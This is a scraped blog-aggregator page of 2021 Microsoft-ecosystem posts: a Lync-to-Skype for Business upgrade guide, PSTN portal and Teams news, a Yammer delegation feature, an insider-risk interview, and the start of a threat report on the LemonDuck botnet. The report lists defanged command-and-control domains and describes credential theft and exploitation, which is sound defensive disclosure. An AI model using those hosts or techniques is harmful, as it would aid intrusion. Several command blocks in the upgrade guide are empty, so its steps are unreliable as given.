Category: Skype for Business

July 24th, 2021 by Eric Marsi

I recently performed a in-place upgrade from Lync Server 2013 to Skype for Business Server 2015 for a customer that is eventually moving to Teams. SFB Server was needed so that the customer can easily move users from within the SFB Server Control Panel. Below are some notes that I have on how to perform this process in 2021 in case you run into any issues like I did :)

In-Place Upgrades of Front-End Servers/Pools

Beginning the migration, I ensured that all Front-Ends had the latest Windows Updates installed and a reasonable amount of available disk space. I proceeded to install the management tools on a NON-SFB Server, ran topology builder, right-clicked the pool that we wanted to upgrade and clicked Upgrade to Skype for Business Server 2015, and then published topology. A few errors were presented about Monitoring Reports Databases on another box, but these can be ignored.

With these steps complete, the following commands were issued on all front-end server(s) in the pool.


I mounted the Skype for Business Server 2015 installation ISO, ran setup.exe and installed any needed updates. Unfortunately, I was presented with the error as shown below:

Before this server can be upgraded, the following must be resolved: KB 2982006, Patch for IIS ( 

Sounds simple right? Install the Update and call it a day! Unfortunately that is not the case. Since the server has been updated on a regular basis, KB2982006 was included in other update rollups and was no longer defined. For this we need to perform a slightly modified method from the guys over at UCLobby

We need to first download the below KB file. If the Microsoft link stops working, please use my blog's mirror (The mirror copy is already in CAB from so skip the next WinRAR step):

After downloading this, open the MSU file in WinRAR and extra the file named to the root of the C Drive (C:). Once in that directory, open PowerShell as an administrator and execute the following command:

.dism /Online /Add-Package /

Once that completes, Press Y to reboot your computer. Upon restart, we want to Make sure that we start all Lync Server 2013 services before attempting a stop or the services will keep trying to start. Open Lync Server Management Shell as an administrator and run the following commands:


At this point, we can launch the Skype for Business Server install wizard again, download updates, and look for the following screen:

Note: If you receive an error like the one below, make sure an updated copy of Topology was published from a non-Lync Server that includes the move to SFB 2015 noted above:

You cannot perform this upgrade until you have used Skype for Business Server 2015, Topology Builder to upgrade the Lync Server 2013 Pools and then publish the upgraded topology. If you have already published an updated topology those changes might not have replicated to this computer. You can force an immediate replication by running the Invoke-CsManagementStoreReplication cmdlet. You can also use the Export-CsConfiguration and Import-CsConfiguration -LocalStore cmdlets to copy the updated topology to this computer. For more information, see the appropriate cmdlet help topic.

The installer will request you reboot the server ~3 times. Upon each reboot, you will need to manually re-mount installation media and re-run setup.exe. At the end of the process you will see the following success screen:

Close the wizard and once again open SFB Server Management Shell as an administrator and run the following command:


Download the latest CU (UCMA Runtime and the Installer) from the link below (At the time of writing, this is CU11 HF4):

Run UcmaRuntime.msp and then SkypeServerUpdateInstaller.exe to update the server. The server will automatically reboot during this installation. Repeat for all server in the pool (If EE) and upon Reboot issue the following command to get services going:


Congratulations! You have migrated your FE Pool from Lync Server 2013 to Skype for Business Server 2015 using the in-place upgrade method. Next we will talk about the requirements for the Edge Pool(s) and the Monitoring Reports Servers

In-Place Upgrades of Edge Servers/Pools

Edge servers that ran Lync Server 2013 are a tad bit different and need a few other updates applied to them. The process I used is as follows:

I installed the .NET 3.5 Features using Server Manager and then ran the following command:


After Stopping Lync Services, an update from SQL Server 2012 Express to 2012 SP1 was needed as a minimum requirement for the upgrade to SFB Server 2015. This update can be downloaded from Microsoft or via my blogs mirror here:

Extract this to the root of your C Drive (C:) and then launch PowerShell as an Administrator. Run the following commands:

cd c:

The full SQL wizard will open and install the update. IF you see it appear and disappear, reboot the machine and perform the start/stop of Lync Server services. After the wizard installs this, reboot the server. Upon Reboot, launch PowerShell as an administrator and run the following commands:

cd c:

After this is complete, reboot the server again and run the following commands:


We are now ready to upgrade the edge server to Skype for Business Server 2015! On the non-sfb management box, update topology to state you want to upgrade this edge to SFB 2015 and publish the topology.

At this point, we can launch the Skype for Business Server install wizard again, download updates, and look for the following screen:

The installer will request you reboot the server 1 time1. after the reboot, you will need to manually re-mount installation media and re-run setup.exe. At the end of the process you will see the following success screen:

Close the wizard and once again open SFB Server Management Shell as an administrator and run the following command:


Download the latest CU (UCMA Runtime and the Installer) from the link below (At the time of writing, this is CU11 HF4):

Run UcmaRuntime.msp and then SkypeServerUpdateInstaller.exe to update the server. The server will automatically reboot during this installation. Repeat for all server in the pool (If EE) and upon Reboot issue the following command to get services going:


Congratulations! You have migrated your Edge Pool from Lync Server 2013 to Skype for Business Server 2015 using the in-place upgrade method. Next we will talk about the requirements for the Monitoring Reports Server(s)

In-Place Upgrades of Monitoring Reports Server(s)

For the Monitoring Reports server(s) we need to perform the following tasks:

Backup any custom reports from the SQL Server Report Server Management URL. If none exist, continue to the next step.

Mount the Skype for Business Server 2015 installation ISO, run setup.exe and install any needed updates. At this point we can click on the Deploy Monitoring Reports button on the right. Run this wizard as needed per your organization's requirements. This will replace all reports in the directory on the report server with the latest 2015 ones.

After this is complete, we are not off to the races just yet. The LCSCDR and QOEMetrics database need updated to the new expected DB schema version. To do this, return to a Skype for Business 2015 Front-End and run the following command:

Install-CsDatabase -ConfiguredDatabases -SqlServerFqdn

After running this, we can run the following command to ensure that the installed and expected version match:

Test-CsDatabase -ConfiguredDatabases -SqlServerFqdn

NOTE: The above image is from my 2019 monitoring server so the versions wont match that of a SQL Box for SFB Server 2015

Restore any custom reports to the Reporting Server reports directory.

Congratulations! You have migrated from Lync Server 2013 to Skype for Business Server 2015 using the in-place upgrade method. If you have any questions, feel free to reach out to me or comment below! :)

Posted in Skype for Business

July 23rd, 2021 by Tom Arbuthnot


Previously Microsoft dealt with Microsoft provided PSTN number porting and number provision issues via some specific email addresses (like ptneu@microsoft and gcstnmsd@microsoft). As of July 22, 2021, the email system has been retired and replaced with a new dedicated portal.

The portal is at but can also be reached via the Teams Admin center:




Hopefully, this will make it easier to manage your PSTN cases with Microsoft. Particularly as you can view your organisation’s cases in one place “view my company cases”.

One gotcha is that only tenant accounts can raise cases for that tenant, so partners will need a tenant account for each tenant to manage this for their customers, but that isn’t a super unusual requirement for managed service partners.

Examples of cases you may raise include:

  • Custom Calling Name (US Only) – Set a custom calling name on your Microsoft phone numbers. This is applicable to United States phone numbers only.
    • Custom calling name to set (15 chars only) – The custom calling name that you want to set. The name has a maximum limit of 15 characters.
    • List of phone numbers – The list of phone numbers for which you want to set a custom calling name value. Upload a CSV file with the list of phone numbers.
  • Inter tenant port – Move phone numbers from one tenant to another. For example, you have two different tenants within Microsoft, and you want to move your phone numbers from one tenant to the other.
    • Source tenant domain name – The tenant from which you want to move phone numbers to a different tenant.
    • Source tenant unique identifier – The tenant ID for the source tenant. This is an optional field.
    • Destination tenant domain name – The tenant to which you want to move phone numbers to.
    • Destination tenant unique identifier – The tenant ID for the destination tenant. This is an optional field.
    • Requested Date time* – The date and time on which you want your numbers moved from the source tenant to the destination tenant. See Date and time.
    • List of phone numbers – The list of phone numbers that you want to move from the source tenant to the destination tenant. Upload a csv file with the list of phone numbers.
  • Inventory Type Change – Change the type of phone number(s). For example, you want to change your Microsoft subscriber numbers to service numbers. For more information about the types of phone numbers Microsoft supports, see Types of phone numbers.
    • Convert to – Select to convert your numbers to user numbers or to service numbers.
    • Preferred Datetime* – The date and time on which you want the inventory type of your numbers to be changed. See Date and time for more information.

      *Date and Time. If you select Country = France, date = 8/14/2021 and time = 10am, then the request will be executed on 8/14/2021 at 10 a.m. French time.

    • Checkbox – I understand that to be able to update the inventory type, my phone numbers need to be unassigned – Microsoft cannot process phone number type change requests unless the phone numbers within your tenant are not assigned. If you are requesting this change for a future date, then you will need to ensure that the numbers are unassigned before your requested date and time.
    • List of phone numbers – The list of phone numbers whose type you want to change. Upload a CSV file with the list of phone numbers.
  • New TN Acquisition – Purchase new phone numbers from Microsoft.
    • Number Type – Select the type for your numbers. See Types of phone numbers.
    • Tried to get phone numbers from the Teams Admin Center Portal – Have you tried purchasing these phone numbers from the Microsoft Teams Admin Center portal, where you can self-serve?
    • Quantity of phone numbers required – The count of phone numbers that you want to purchase.
    • State/Province – The state/province within your country/region for which you want phone numbers.
    • City – The city within the state/province for which you want phone numbers.
    • Office address – This is specific to certain countries only. This is the site address of your office.
    • Directory listing – This is specific to certain countries only. Do you want to publish your company information with the phone numbers?
  • Port in – Port existing phone numbers from your current service provider to Microsoft.
    • Name your port order – Provide an easy-to-remember name for your port request.
    • Requested porting date/time* – The date and time on which you want the numbers to port to Microsoft. Please note that this is not a guaranteed porting date, since the current number owner has to approve our port request first. See Date and time.
    • List of porting numbers – The list of phone numbers that you would like to port to Microsoft. Upload a CSV file with the list of phone numbers.
    • Letter of authorization (LOA) – Attach a signed and filled out LOA here. Microsoft cannot process a port request without an LOA.
  • Address Update – Update emergency calling address. Note that this field applies to select countries only.
    • Location id – The location ID for your emergency address.
    • List of phone numbers – The list of phone numbers for which you want to change the emergency address (enter your desired address in the Description field). Upload a CSV file with the list of phone numbers.


Microsoft docs PSTN Service Desk

Posted in Skype for Business

July 23rd, 2021 by Tom Arbuthnot

One good session from Inspire 2021 was on partners growing their Teams practice and the opportunity around Teams Phone.

In included a Teams Calling roadmap update.


Image from The Year of Teams Phone – Grow Your Practice

Most of this was already known about, but something public for the first time is “Client SDK to support ISV attendant console solutions”.

This is something the Teams space has really been waiting on. It’s a heavily upvoted item on User Voice

What is an SDK? SDK stands for Software Development Kit, it means a set of code and tools to allow you to, in this case, make a client-side app or control a client.

I wonder if this client SDK will somehow relate to the new Teams 2.0/Webview2 work.

Either way, this is great news for the Microsoft Teams Ecosystem. I’m talking to a few attendant console providers to get their insights and will update the blog when I hear more.

Stay tuned to the blog for updates.

Posted in Skype for Business

July 23rd, 2021 by Tom Arbuthnot

One of the big announcements from Microsoft Inspire last week was the integration between Microsoft Teams and Microsoft Dynamics 365, Microsoft’s enterprise resource planning (ERP) and customer relationship management (CRM) platform.

Microsoft is “launching” the same news multiple times these days, as it was also announced at Ignite, the customer conference in March 2021. Tom Morgan did a good overview at the time here.

Microsoft made a big deal about there being no cost for this integration. Being that they are both Microsoft products, to be honest I wouldn’t have assumed there would be a cost.

What does the Dynamics 365 and Microsoft Teams Integration allow you to do?

  • Automated notifications of Dynamics 365 events into Microsoft Teams
  • Adaptive card notifications allow for buttons and input, to allow connected workflows
  • View and collaborate on Dynamics 365 customer records right within a Teams chat or channel
  • Dynamics 365 users can now add a Teams meeting when creating an appointment
  • Enable access to key customer information during a Teams call
  • Capture notes directly with the Teams call, which are saved in the timeline of the Dynamics 365 record

Microsoft has also shown previously how they intend to allow integration between Teams Webinars and Dynamics 365 marketing

Example of the Dynamics 365 meetings app, with records details and notes


Example of an adaptive card notification from Dynamics 365 into Microsoft Teams


It looks like the connectors to push adaptive cards into Teams and surface records in Tabs in teams are available, but I can’t see the Teams meeting app yet.

What was missing from this announcement, which was shown in March 2021 was the ability to make a Teams call directly from within Dynamics 365. Hopefully, that is still coming.

Modality is a Teams and Dynamics 365 user, so I will update the blog when the calling or meetings app becomes available.


Install and set up Microsoft Teams integration

Bring Dynamics 365 into the flow of work with Teams—at no additional cost

From collaborative apps in Microsoft Teams to Windows 365—here’s what’s new in Microsoft 365 at Inspire

Posted in Skype for Business

July 23rd, 2021 by M365 Now News Feed
Power Automate Desktop comes with new features in July 2021 release, including silent registration for machines, automatic detection of Windows proxy settings and more.

Posted in Skype for Business

July 22nd, 2021 by Josh Leporati

Version 1.2 of our Champion Management Platform is now available! You can find out more information on the platform itself here and view the GitHub code here to get started on your upgrade or new install!

What's new?


Single site for all resources

We have addressed lots of feedback about security and permissions, as well as standardized all the platform assets into one SharePoint site (ChampionManagementPlatform). Now after you complete the first run experience, all lists will be located in this one site instead of across multiple locations! This should help simplify access and permissions when enabling your organization to access the resources for the Champion Management Platform.

Manage Champion approvals directly from the app

Champion managers will notice a new option to manage approvals directly from the app homepage. From here, you can easily approve or reject new nominations for the program. You can still visit the MemberList to change the status of the champion from pending to approved.



New fields in the Event Track List

When Champions log their events through the Leader Board, Champion managers will also see the Champion Name and Event Name listed out in the Event Track List. This should help in reporting and quickly identifying and sorting events based on the actual name and event type when looking through the data.



We hope you take an opportunity to explore this update and continue to let us know your thoughts and ideas on what you would like to see us improve on this solution! The Champion community is one close to our hearts and thanks for everything you continue to do!



Posted in Skype for Business

July 22nd, 2021 by Lauren Goodwin

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

Computer-aided design (CAD) files are used by design professionals in the manufacturing, engineering, architecture, surveying, and construction industries. These highly valuable files contain confidential information and form their core intellectual property (IP).

Loss of such proprietary information to an outsider or a competitor can have disastrous effects leading to a loss in sales, market share, and reduced profit margins. However, such industries often collaborate with other design partners or vendors or they share their design parts with smaller manufacturers. Product blueprints and designs are regularly exchanged, both within and outside the organization’s network boundaries. In such cases, there is a high possibility of a data leak.

Data loss or theft can occur in any one of the following ways:

  1. Every time you send a file to another person, a copy is usually made and stored online. Once the file leaves the organization there is no guarantee that it is safe unless it is adequately protected.
  2. Storing and transferring the file to another system.
  3. A malicious insider may have a copy of the file and the ability to share the information with an outsider, even after leaving the organization.

Microsoft Information Protection works where perimeter security fails

Organizations may use encryption programs, secure file transfer protocol, and other access control methods to prevent data leaks and data theft. However, once these files leave their original repository it is very difficult to keep track of their usage.

To solve this problem, organizations have invested in Microsoft Information Protection (MIP) an intelligent, unified, and extensible solution to protect sensitive data across your enterprise—in Microsoft 365 cloud services, on-premises, third-party software as a service (SaaS) applications, and more. MIP provides a unified set of capabilities to know your data, protect your data, and help prevent data loss across Microsoft 365 apps (such as Word, PowerPoint, Excel, and Outlook) and services (such as Teams, SharePoint, and Exchange).

Microsoft Information Protection capabilities.

When you have already invested in an excellent information protection system, it isn’t a prudent decision to go in for another information protection system. But what can be done to solve the above problem?

MIP and HALOCAD for secured digital collaboration at a global scale

SECUDE has integrated their HALOCAD solution with Microsoft’s MIP SDK which extends the data protection beyond the organization’s IT perimeter. HALOCAD not only integrates as a MIP SDK add-in into the content authoring environment but also works as an add-on into the content repository and implements information protection policies across supported repositories.

HALOCAD solution architectural diagram 1

With over two decades of experience in the data security field, SECUDE has a track record of adding value to the MIP capabilities to SAP environments, especially when exporting sensitive information from SAP environments. HALOCAD helps to seamlessly leverage MIP labeling templates for CAD files and does so simply and cost-effectively. It also applies the label to the content repository where the engineering processes for storing and sharing CAD files are kept.

Let us look at a hypothetical scenario on how data collaboration happens between the engineering team and the external third party vendors and suppliers with HALOCAD and MIP:

HALOCAD solution architectural diagram 2

In the above scenario, the design files move seamlessly across the supply chain with MIP sensitivity labels applied automatically and user privileges as defined by the organization.

Scenario 1 (Designer):

The user is the designer who owns the design files. Based on the user privilege defined, the designer can view, edit, copy, print, and export the files

Scenario 2 (Engineer):

The user is an engineer who consumes the design file shared with them by the engineering team. The engineer can view and edit the files. They can make modifications to the original file and share it. They do not have the privilege to copy, print, export, and use the snipping tool to make a copy.

Scenario 3 (Partner who has SECUDE solution):

In a typical manufacturing environment, the CAD drawings are shared with a lot of third-party partners and vendors across the supply chain for day-to-day operations. In this scenario, the partner who has purchased the SECUDE solution can only view the CAD files per the set privilege enforcement.

Scenario 4 (Unauthorized user):

If an unauthorized user outside of the organization tries to open the CAD drawings, the files are encrypted, and he will not be able to open the file.

Benefits of SECUDE’s HALOCAD

  1. HALOCAD extends the security templates provided by MIP to sensitive CAD files throughout the design lifecycle.
  2. HALOCAD applies sensitivity labels automatically during the check-out process without user engagement.
  3. HALOCAD preserves the extension of the file, allowing users to not see the difference and the workflow is not disrupted.
  4. An unauthorized user using an AutoCAD application without the HALOCAD extension tries to open a document, they will not be able to open the file through the extension is *.dwg.
  5. HALOCAD currently supports the following CAD applications:
    • Autodesk Inventor and AutoCAD
    • PTC Creo
    • Siemens NX and Solid Edge
  1. HALOCAD also supports the following PLM applications:
    • PTC Windchill
    • Siemens Teamcenter

For more information about the HALOCAD solution, please visit the SECUDE HALOCAD website. You can also find HALOCAD in Azure Marketplace.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


The post How to protect your CAD data files with MIP and HALOCAD appeared first on Microsoft Security Blog.

Posted in Skype for Business

July 22nd, 2021 by fernandomartinezovelar

We’re excited to announce that users can now post on behalf of another user in Yammer. Once approval is granted, internal communicators can use this feature to share news and updates as well as reply to comments on behalf of leaders and their teams. This is not limited to Yammer admins - any user can choose to delegate access to any other person within the network by following the steps below. 


Yammer Post on Behalf Of - Image 1.png


Setting up your delegate  


There are two types of delegate roles. The first type is the Delegate Manager. A delegate manager can post on behalf of the other user. They can also add or remove other delegates on behalf of the other user. The second type is the Delegate. Delegates can post on behalf of the other user, but they cannot add or remove other delegates on behalf of the other user. 


Any Yammer user can add another user from the same Yammer network as their delegate or delegate manager. Any message posted by a delegate or delegate manager will trigger a notification for the user who will appear as the author of the post. All other delegates that belong to that user’s delegate team will also get the notification.  

MicrosoftTeams-image (10).png


Note: This information will also be displayed in the e-Discovery records and will be viewable by admins. 


How to add a delegate: 


  1. Click on the Settings icon on the top right corner of 
  2. Click on Manage delegate settings
  3. Add the name of the person who will be the delegate or delegate manager. 
  4. Choose the type of delegate. 
  5. The delegate can now start posting on behalf of the user in any public or private Yammer community as long as both the delegate and the user have access to it. 


Yammer Post on Behalf Of - Image 2.png


As soon as a user gets a new delegate assigned to the delegate team, that individual as well as the whole team of delegates will receive an email notifying them of this action. Subsequently, when a delegate is removed that same audience is notified via email. When a delegate posts, the user will be notified that as post was made on their behalf.  


What can a delegate do on behalf of their delegate user? 


  • Start a new conversation, announcement, poll, question in Yammer communities where both users have access 
  • Edit a message 
  • Post a comment  
  • Delete a message 
  • Post, edit, reply in Outlook, SharePoint and Microsoft Teams 
  • Add or remove other delegates, if designated a delegate manager 
  • View notifications of the responses, replies to the original post 



What cannot be done as a delegate? 


  • View analytics on a conversation 
  • Post private messages  
  • React to a conversation  


Recommendations for working with leaders 


We know from experience that leadership engagement is a key to success in Yammer networks. We are making it as frictionless as possible for leaders to start conversations. As Yammer encourages two-way conversations, we believe that even messages posted on your behalf should still be authentic discussions. 


If your senior leaders are hesitant to use Yammer, this could be a great way to start adding Yammer to their communication channels. Need more resources to support your conversation with leaders? Check out our Leadership Engagement deep dive to get started.   

From our experience, helping your leaders understand what Yammer is and how the conversations and connections can benefit them, creates the foundation of the importance of communities in your organization. As leaders start to participate more actively, their interaction with Yammer may continue to evolve.


Here’s a few guidelines for getting your leaders started with Yammer:  


Step 1 – Make sure your leader has an active Yammer account, including a profile picture. Ensure that your leader has joined a few relevant communities. Show them their peers and examples of good, better, best types of conversations to get their interests piqued.  


Step 2 – Brainstorm with your leader and communications team to figure out a plan for posting and replying that involves a variety of ways to participate. Build out a simple communications rhythm for your leader and community. Does your leader need to post weekly? Or is this interaction part of a larger campaign that they are spearheading? The level of interaction from your leader can help shape their engagement plan.  


Step 3 – Work on the actual content and messaging together. Understanding that the message needs to be authentic…how is this different than other channels they can use to communicate? Can your leader record a video to share their message and the delegate can post it on behalf of them? Or can the leader share a few bullet points of the message needed and the delegate can work on the tone, formatting and grammar? 


Step 4 – Post! Be sure to set expectations for replies and follow-up questions to the leader's conversations. 


Note: At this time, users cannot react on behalf of someone else.


How do you see leaders at your organization using Yammer? 



Frequently Asked Questions 


Can we determine if someone posted on behalf of someone else? 


If User A posts on behalf of User B, then User B gets a notification. The Yammer network admins can use the e-Discovery portal to see who posted on behalf of someone else. Within the Yammer feeds and conversations, there won’t be any signal indicating that the message was posted by a different user.  



How many delegates can a user add? 


You can add up to 20 delegates. 



If User A removes User B as her or his delegate, then what happens to all the previous posts made by User B on behalf of User A? 


No changes will happen. All messages posted by User B on behalf of User A will continue to exist. These messages will continue to be shown as posted by User A.  



Can the delegate post private messages or messages in private Yammer communities on behalf of someone else? 


The delegate can only post in Yammer communities where both users have access. Delegates cannot post Yammer private messages on behalf of someone else. 



Can User A post an announcement on behalf of User B? 


Yes, if the delegate is an admin in the Yammer community, she or he can post the message as an announcement. 




Stay in touch for more updates and what's coming next with Yammer on the blog. 


Fernando Martinez Ovelar, Sr Product Marketing Manager, Microsoft 



Posted in Skype for Business

July 22nd, 2021 by Emma Jones

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Product Marketing Manager Natalia Godyla talks with Rockwell Automation Vice President and Chief Information Security Officer Dawn Cappelli. In this blog post, Dawn talks about the importance of including insider risk in your cybersecurity plan. 

Natalia: What is the biggest barrier that organizations face in addressing insider risk?

Dawn: The biggest barrier is drawing attention to insider risk. We heard about the ransomware group bringing down the Colonial Pipeline. We hear about ransomware attacks exposing organizations’ intellectual property (IP). We’re not hearing a lot about insider threats. We haven’t had a big insider threat case since Edward Snowden so that sometimes makes it hard to get buy-in for an insider risk program. But I guarantee insider threats are happening. Intellectual property is being stolen and systems are being sabotaged. The question is whether they are being detected—are companies looking?

Natalia: How do you assess the success of an insider risk program?

Dawn: First, we measure our success by significant cases. For instance, we have someone leaving the company to go to a competitor, we catch them copying confidential information that they clearly want to take with them, and we get it back.

Second, we measure success by looking at the team’s productivity. Everyone in the company has a risk score based on suspicious or anomalous activity as well as contextual data, for instance, they are leaving the company. Every day we start at the top of the dashboard with the highest risk and work our way down. We look at how many cases have no findings because that means we’re wasting time, and we need to adjust our risk models to eliminate false positives.

We also look at the reduction in cases because we focus a lot on deterrence, communication, and awareness, as well as cases by business unit and by region. We run targeted campaigns and training for specific business units or types of employees, regions, or countries, and then look at whether those were effective in reducing the number of cases.

Natalia: How does measuring internal threats differ from measuring external threats?

Dawn: From an external risk perspective, you need to do the same thing—see if your external controls are working and if they’re blocking significant threats. Our Computer Security Incident Response Team (CSIRT) also looks at the time to contain and the time to remediate. We should also measure how long it takes to respond and recover IP taken by insiders.

By the way, I like using the term “insider risk” instead of “insider threat” because we find that most suspicious insider activity we detect and respond to is not intentionally malicious. Especially during COVID-19, we see more employees who are concerned about backing up their computer, so they pull out their personal hard drive and use it to make a backup. They don’t have malicious intent, but we still must remediate the risk. Next week they could be recruited by a competitor, and we can’t take the chance that they happen to have a copy of our confidential information on a removable media device or in personal cloud storage.

Natalia: How do you balance protecting against external threats and managing insider risks?

Dawn: You need to consider both. You should be doing threat modeling for external threats and insider risks and prioritizing your security controls accordingly. An insider can do anything an external attacker can do. There was a case in the media recently where someone tried to bribe an insider to plug in an infected USB drive to get malware onto the company’s network or open an infected attachment in an email to spread the malware. An external attacker can get in and do what they want to do much easier through an insider.

We use the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) for our security program, and we use it to design a holistic security program that encompasses both external and insider security risks. For example, we identify our critical assets and who should have access to them, including insiders and third parties. We protect those assets from unauthorized access—including insiders and outsiders. We detect anomalous or suspicious behavior from insiders and outsiders. We respond to all incidents and recover when necessary. We have different processes, teams, and technologies for our insider risk program, but we also use many of the same tools as the CSIRT, like our Security Information and Event Management (SIEM) and Microsoft Office 365 tools.

Natalia: What best practices would you recommend for data governance and information protection?

Dawn: Don’t think about insider threats only from an IP perspective. There’s also the threat of insider cyber sabotage, which means you need to detect and respond to activities like insiders downloading hacking tools or sabotaging your product source code.

Think about it: an external attacker has to get into the network, figure out where the development environment is, get the access they need to compromise the source code or development environment, plant the malicious code or backdoor into the product—all without being detected. It would be a lot easier for an insider to do that because they know where the development environment is, they have access to it, and they know how the development processes work.

When considering threat types, I wouldn’t say that you need to focus more on cyber sabotage than IP; you need to focus on them equally. The mitigations and detections are different for IP theft versus sabotage. For theft of IP, we’re not looking for people trying to download malware, but for sabotage, we are. The response processes are also different depending on the threat vector.

Natalia: Who needs to be involved in managing and reducing insider risk, and how?

Dawn: You need an owner for your insider risk program, and in my opinion, that should be the Chief Information Security Officer (CISO). HR is a key member of the virtual insider risk team because happy people don’t typically commit sabotage; it’s employees who are angry and upset, and they tend to come to the attention of HR. Every person in Rockwell HR takes mandatory insider risk training every year, so they know the behaviors to look for.

Legal is another critical member of the team. We can’t randomly take people’s computers and do forensics for no good reason, especially in light of all the privacy regulations around the world. The insider risk investigations team is in our legal department and works with legal, HR, and managers. For any case involving personal information and any case in Europe, we go to our Chief Privacy Officer and make sure that we’re adhering to all the privacy laws. In some countries, we also have to go to the Works Council and let them know we’re investigating an employee. The security team is responsible for all the controls—preventive, detective—technology, and risk models.

Natalia: What’s next in the world of data regulation?

Dawn: Privacy is the biggest issue. The Works Councils in Europe are becoming stronger and more diligent. They are protecting the privacy of their fellow employees, and the privacy review processes make the deployment of monitoring technology more challenging.

In the current cyber threat environment, we must figure out how to get security and privacy to work together. My advice to companies operating in Europe is to go to the Works Councils as soon as you’re thinking about purchasing new technology. Make them part of the process and be totally transparent with them. Don’t wait until you’re ready to deploy.

Natalia: How will advancements like cloud computing and AI change the risk landscape?

Dawn: We have a cloud environment, and our employees are using it to develop products. From inception, the insider risk team worked to ensure that we’re always threat modeling the environment. We go through the entire NIST CSF for that cloud environment and look at it from both an external and insider risk perspective.

Companies use empirical, objective data to create and train AI models for their products. The question becomes, “Do you have controls to identify an insider who deliberately wants to bias your models or put something malicious into your AI models to make it go off course later?” With any type of threat, ask if an insider could facilitate this type of attack. An insider can do anything an outsider can do, and they can do it much easier.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A guide to balancing external threats and insider risk appeared first on Microsoft Security Blog.

Posted in Skype for Business

July 22nd, 2021 by Eric Avena

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 will be a deep dive on the attacker behavior and will provide investigation guidance.]

Combating and preventing today’s threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines—even so-called commodity malware—can bring in more dangerous threats. We’ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

Figure 1. Global distribution of LemonDuck botnet activity

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing “Lemon_Duck” explicitly in script.

The second infrastructure, which we call “Cat” infrastructure—for primarily using two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.


Sample Duck domains Sample Cat domains
  • cdnimages[.]xyz
  • bb3u9[.]com
  • zz3r0[.]com
  • pp6r1[.]com
  • amynx[.]com
  • ackng[.]com
  • hwqloan[.]com
  • js88[.]ag
  • zer9g[.]com
  • b69kq[.]com
  • sqlnetcat[.]com
  • netcatkit[.]com
  • down[.]sqlnetcat[.]com


